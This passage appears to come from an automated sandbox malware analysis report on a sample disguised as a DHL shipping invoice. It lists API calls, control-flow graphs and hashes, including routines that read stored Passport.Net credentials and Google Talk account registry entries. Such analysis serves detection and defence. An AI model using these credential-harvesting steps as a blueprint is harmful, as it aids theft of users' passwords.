                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                                                                                                      • API String ID: 4000595657-3671122194
                                                                                                                                                                                                                                      • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 383 40ccd7-40cd06 ??2@YAPAXI@Z 384 40cd08-40cd0d 383->384 385 40cd0f 383->385 386 40cd11-40cd24 ??2@YAPAXI@Z 384->386 385->386 387 40cd26-40cd2d call 404025 386->387 388 40cd2f 386->388 389 40cd31-40cd57 387->389 388->389 391 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 389->391 392 40cd59-40cd60 DeleteObject 389->392 392->391
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040CD96
                                                                                                                                                                                                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2054149589-0
                                                                                                                                                                                                                                      • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 400 44b40e-44b415 GetModuleHandleA 401 44b455 400->401 402 44b417-44b426 call 44b42b 400->402 404 44b457-44b45b 401->404 411 44b48d 402->411 412 44b428-44b433 GetProcAddress 402->412 406 44b45d-44b465 GetModuleHandleA 404->406 407 44b49a call 44b49f 404->407 410 44b467-44b46f 406->410 410->410 413 44b471-44b474 410->413 415 44b48e-44b496 411->415 412->401 416 44b435-44b442 VirtualProtect 412->416 413->404 414 44b476-44b478 413->414 417 44b47e-44b486 414->417 418 44b47a-44b47c 414->418 424 44b498 415->424 420 44b454 416->420 421 44b444-44b452 VirtualProtect 416->421 422 44b487-44b488 GetProcAddress 417->422 418->422 420->401 421->420 422->411 424->413
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                                      • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                                      • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 448 40ba28-40ba3a 449 40ba87-40ba9b call 406c62 448->449 450 40ba3c-40ba52 call 407e20 _mbsicmp 448->450 472 40ba9d call 4107f1 449->472 473 40ba9d call 404734 449->473 474 40ba9d call 404785 449->474 475 40ba9d call 403c16 449->475 476 40ba9d call 410a9c 449->476 455 40ba54-40ba6d call 407e20 450->455 456 40ba7b-40ba85 450->456 462 40ba74 455->462 463 40ba6f-40ba72 455->463 456->449 456->450 457 40baa0-40bab3 call 407e30 465 40bab5-40bac1 457->465 466 40bafa-40bb09 SetCursor 457->466 464 40ba75-40ba76 call 40b5e5 462->464 463->464 464->456 468 40bac3-40bace 465->468 469 40bad8-40baf7 qsort 465->469 468->469 469->466 472->457 473->457 474->457 475->457 476->457
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                                      • API String ID: 882979914-1578091866
                                                                                                                                                                                                                                      • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2152742572-0
                                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,757C0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                      • API String ID: 889583718-2036018995
                                                                                                                                                                                                                                      • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                                      • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`|u,00407A43,00000001,?,00000000,`|u,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                                      • String ID: `|u
                                                                                                                                                                                                                                      • API String ID: 3056473165-3020955264
                                                                                                                                                                                                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,757C0A60), ref: 00408D5C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,757C0A60), ref: 00408D7A
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,757C0A60), ref: 00408D98
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,757C0A60), ref: 00408DA8
                                                                                                                                                                                                                                      Memory Dump Source
